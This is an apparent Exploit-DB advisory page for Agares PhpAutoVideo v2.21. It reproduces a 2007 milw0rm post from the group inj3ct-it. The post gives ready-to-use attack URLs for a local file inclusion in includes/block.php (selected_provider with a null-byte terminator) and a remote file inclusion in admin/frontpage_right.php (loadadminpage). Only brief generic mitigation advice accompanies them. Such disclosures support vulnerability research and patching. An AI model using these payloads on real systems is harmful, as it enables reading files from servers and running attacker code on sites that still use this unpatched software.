Agares PhpAutoVideo v2.21 - Remote File Inclusion + Local File Inclusion

vendor:

Agares PhpAutoVideo

by:

MhZ91

N/A

CVSS

HIGH

Remote File Inclusion + Local File Inclusion

CWE

Product Name: Agares PhpAutoVideo

Affected Version From: Agares PhpAutoVideo v2.21

Affected Version To: Agares PhpAutoVideo v2.21

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Agares PhpAutoVideo v2.21 – Remote File Inclusion + Local File Inclusion

This exploit allows an attacker to include remote or local files in the vulnerable application. In the case of Local File Inclusion, an attacker can include files from the target system, potentially leading to information disclosure or remote code execution. In the case of Remote File Inclusion, an attacker can include arbitrary files from external servers, potentially leading to remote code execution.

Mitigation:

To mitigate the risk of Local File Inclusion, ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions. For Remote File Inclusion, avoid using user-supplied input to include files without proper validation and sanitization.

Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------

Http://www.inj3ct-it.org        Staff[at]inj3ct-it[dot]org   

---------------------------------------------------------------

    Remote File Inclusion + Local File Inclusion

---------------------------------------------------------------

# Author: MhZ91
# Title: Agares PhpAutoVideo v2.21 - Remote File Inclusion + Local File Inclusion
# Download: http://scriptmafia.org/2007/12/19/agares_phpautovideo_v2.21.html
# Bug: Remote File Inclusion + Local File Inclusion
# Visit: http://www.inj3ct-it.org

---------------------------------------------------------------

Local File Inclusion:

http://[site]/includes/block.php?selected_provider=[LFI]%00

---------------------------------------------------------------

Remote File Inclusion

http://[site]/admin/frontpage_right.php?loadadminpage=[Evil_Code]

---------------------------------------------------------------

# milw0rm.com [2007-12-24]